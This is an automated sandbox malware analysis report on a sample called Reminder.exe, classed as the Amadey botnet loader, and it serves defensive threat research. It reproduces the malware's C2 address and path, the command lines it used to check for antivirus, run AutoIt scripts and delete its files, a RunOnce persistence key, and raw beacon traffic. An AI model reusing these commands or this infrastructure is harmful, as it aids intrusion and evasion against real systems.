Edit tour

Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name:	Reminder.exe
Analysis ID:	1543320
MD5:	df45696ef1463f335a6cc5dc72c607d0
SHA1:	699eaf22d81b5dd5a7177641d9a784db7dd80eb9
SHA256:	2e29ddac4856b370c1c8e7ebc3dd90afeafddaf932b17fcf91f1150d52ee28d7
Tags:	ClickFixexeuser-monitorsg
Infos:

Detection

Amadey

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Sigma detected: Silenttrinity Stager Msbuild Activity

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

Reminder.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\Reminder.exe" MD5: DF45696EF1463F335A6CC5DC72C607D0)

Reminder.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe" MD5: 45CC5C19328748F850CC9FE5E65AC9F3)

Reminder.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: DF45696EF1463F335A6CC5DC72C607D0)

Reminder.tmp (PID: 2800 cmdline: "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: 45CC5C19328748F850CC9FE5E65AC9F3)

cmd.exe (PID: 2084 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3844 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 280 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 2188 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6408 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 4544 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 6548 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7024 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5780 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 2872 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5016 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6636 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 6952 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2476 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 2056 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 6536 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2316 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 4544 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

Updater.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv" MD5: 3F58A517F1F4796225137E7659AD2ADB)

cmd.exe (PID: 5852 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 6092 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

Updater.exe (PID: 1612 cmdline: updater.exe C:\ProgramData\\huv9LF4.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)

MSBuild.exe (PID: 5640 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 2284 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

AutoIt3.exe (PID: 2536 cmdline: "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)

MSBuild.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 4936 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 1732 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

AutoIt3.exe (PID: 3272 cmdline: "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)

MSBuild.exe (PID: 6276 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 2792 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "152.89.198.124/8bdDsv3dk2FF/index.php", "Version": "5.03", "Install Folder": "e7e219b706", "Install File": "Gxtuum.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: Updater.exe PID: 1612	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 2536	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 3272	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
35.2.Updater.exe.4292be0.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
38.2.AutoIt3.exe.44e2be0.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.2.AutoIt3.exe.4382be0.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
41.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
38.2.AutoIt3.exe.44e2be0.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
35.2.Updater.exe.4292be0.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.2.AutoIt3.exe.4382be0.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
41.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 152.89.198.124, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 57713

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\friend\Updater.exe, ProcessId: 1612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fkccfcd

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T17:11:06.682086+0100	2856147	1	A Network Trojan was detected	192.168.2.4	57736	152.89.198.124	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T17:11:04.069020+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57723	152.89.198.124	80	TCP
2024-10-27T17:11:09.075978+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57751	152.89.198.124	80	TCP
2024-10-27T17:11:14.044735+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57783	152.89.198.124	80	TCP
2024-10-27T17:11:18.955990+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57808	152.89.198.124	80	TCP
2024-10-27T17:11:23.888441+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57835	152.89.198.124	80	TCP
2024-10-27T17:11:29.299694+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57862	152.89.198.124	80	TCP
2024-10-27T17:11:34.330315+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57893	152.89.198.124	80	TCP
2024-10-27T17:11:39.303022+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57920	152.89.198.124	80	TCP
2024-10-27T17:11:44.290710+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57947	152.89.198.124	80	TCP
2024-10-27T17:11:49.677794+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57979	152.89.198.124	80	TCP
2024-10-27T17:11:54.997339+0100	2856148	1	A Network Trojan was detected	192.168.2.4	57998	152.89.198.124	80	TCP
2024-10-27T17:11:59.950646+0100	2856148	1	A Network Trojan was detected	192.168.2.4	58000	152.89.198.124	80	TCP
2024-10-27T17:12:04.953738+0100	2856148	1	A Network Trojan was detected	192.168.2.4	58002	152.89.198.124	80	TCP
2024-10-27T17:12:09.870564+0100	2856148	1	A Network Trojan was detected	192.168.2.4	58004	152.89.198.124	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "152.89.198.124/8bdDsv3dk2FF/index.php", "Version": "5.03", "Install Folder": "e7e219b706", "Install File": "Gxtuum.exe"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.7% probability

Source: Reminder.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2

Source: Reminder.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_0073E180
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_0074A187
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_0074A2E4
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,	35_2_0074A66E
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose,	35_2_0074686D
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose,	35_2_0073E9BA
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_007474F0 FindFirstFileW,FindClose,	35_2_007474F0
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	35_2_00747591
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_0073DE32
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	35_2_014A3ECD
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	35_2_014A17FD
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A3FD5 FindFirstFileA,GetLastError,	35_2_014A3FD5
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00CEA187
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00CDE180
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00CEA2E4
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00CEA66E
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose,	38_2_00CE686D
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00CDE9BA
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE74F0 FindFirstFileW,FindClose,	38_2_00CE74F0
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	38_2_00CE7591
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00CDDE32
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	38_2_01653765
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	38_2_01651095
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_0165386D FindFirstFileA,GetLastError,	38_2_0165386D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:57736 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57723 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57783 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57751 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57808 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57835 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57893 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57862 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58000 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58002 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57920 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57947 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57979 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57998 -> 152.89.198.124:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58004 -> 152.89.198.124:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 152.89.198.124

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: global traffic

TCP traffic: 192.168.2.4:57709 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
